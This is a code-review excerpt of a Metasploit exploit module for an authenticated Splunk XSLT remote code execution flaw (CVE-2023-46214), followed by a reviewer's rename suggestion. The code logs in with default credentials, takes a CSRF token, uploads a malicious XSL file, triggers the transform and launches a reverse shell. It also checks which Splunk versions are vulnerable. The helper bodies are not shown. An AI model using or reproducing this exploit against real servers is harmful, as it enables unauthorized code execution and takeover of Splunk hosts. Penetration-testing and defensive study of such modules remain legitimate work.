modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb

```diff
@@ -0,0 +1,413 @@
+        'References' => [
+          ['CVE', '2023-46214'],
+          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],
+          ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory
+          ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2023-11-28',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8000
+        },
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),
+      ]
+    )
+  end
+
+  def exploit
+    auth_result, cookie_string = authenticate
+    unless auth_result
+      fail_with(Failure::NoAccess, 'Authentication failed')
+      return
+    end
+
+    sleep(0.3)
+    csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)
+    unless csrf_token
+      fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')
+      return
+    end
+
+    sleep(0.3)
+    malicious_xsl = generate_malicious_xsl
+    uploaded, text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)
+    unless uploaded
+      fail_with(Failure::Unknown, 'File upload failed')
+    end
+
+    sleep(0.3)
+    jsid_created, jsid = get_job_search_id(csrf_token, updated_cookie_string)
+    unless jsid_created
+      fail_with(Failure::Unknown, 'Creating job failed')
+    end
+
+    sleep(0.3)
+    unless trigger_xslt_transform(jsid, text_value, updated_cookie_string)
+      fail_with(Failure::Unknown, 'XSLT Transform failed')
+    end
+
+    sleep(0.3)
+    unless trigger_reverse_shell(jsid, csrf_token, updated_cookie_string)
+      fail_with(Failure::Unknown, 'Failed to execute reverse shell')
+    end
+  end
+
+  def check
+    unless splunk?
+      return CheckCode::Unknown('Target does not appear to be a Splunk instance')
+    end
+
+    auth_result, cookie_string = authenticate
+    unless auth_result
+      fail_with(Failure::NoAccess, 'Authentication failed')
+      return
+    end
+
+    version = get_version_authenticated(cookie_string)
+    return CheckCode::Unknown('Unable to determine Splunk version') unless version
+
+    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) ||
+       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1'))
+      return CheckCode::Appears("Exploitable version found: #{version}")
+    end
+
+    CheckCode::Safe("Non-vulnerable version found: #{version}")
+  end
+
+  def trigger_reverse_shell(jsid, csrf_token, cookie_string)
```

Comment:
Not all payloads are reverse shells so this method should probably be renamed.
```suggestion
  def trigger_payload(jsid, csrf_token, cookie_string)
```